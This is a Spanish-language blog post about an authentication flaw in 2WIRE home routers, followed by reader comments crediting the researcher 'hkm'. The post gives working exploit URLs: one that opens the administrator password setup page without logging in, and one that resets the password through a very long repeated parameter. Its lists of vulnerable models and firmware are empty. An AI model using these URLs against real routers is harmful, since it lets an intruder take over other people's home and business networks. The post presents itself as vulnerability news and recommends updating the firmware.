Aquí encontrarás todo lo relacionado a la tecnología, computación, informática y demás. Enterate de las noticias del momento en cuanto a tecnología se refiere.





Grave vulnerabilidad de Autentificación en routers 2WIRE


2wire_4

Ha sido publicada una vulnerabilidad de los routers 2WIRE en el cual puedes cambiar el password de Administrador si éste ya fué configurado.

Los modelos vulnerables son:

Y los firmwares vulnerables:

Firmware NO VULNERABLE:
5.29.135.5

Para establecer una nueva contraseña si ésta ya fué establecida, simplemente vamos a ésta dirección:


http://gateway.2wire.net?xslt?page=CD35_SETUP_01

Si quieres resetear el password:


http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm

hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm

2wire

Descargar video demostrativo.

Conclusión:

Los problemas con los routers 2WIRE continuan , y ésto afecta a grandes compañias que utilizan éste tipo de aparatos, lo más recomendable es comprar otro tipo de router ó actualizar el firmware de nuestro router 2WIRE.

Post Relacionados:


Búsquedas hacia éste artículo:


3 Comentarios »

RSS feed para los comentarios de esta entrada. TrackBack URI

  1. Salu2.

    Esta vulnerabilidad ya tiene un tiempo anunciada. Pero creo que lo importante es que te falto un crédito a la persona que la descubrió (Pedro Joaquín) http://www.hakim.ws/ mejor conocido como hkm. Incluso lo tienes de alguna manera “mencionado” pero no haces referencia a su trabajo. (Dicho sea de paso, hkm fue ponente en la DEFCON este año)

    Comentario por driver — August 25, 2009 #

  2. Así es, hkm http://www.hakim.ws es el responsable de esta investigación.

    Ya se encuentra publicado en el sitio de defcon el material de su participación.

    http://www.defcon.org/html/links/dc-archives/dc-17-archive.html#Joaquin

    Saludos.

    Comentario por DnB — September 17, 2009 #

  3. Gracias driver por defender mi trabajo.

    Pueden entrar a http://www.hakim.ws para las ultimas vulnerabilidades de este dispositivo. Saludos,

    hkm

    Comentario por hkm — November 17, 2009 #

Dejar un comentario

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Todos los derechos reservados. Tecnologia.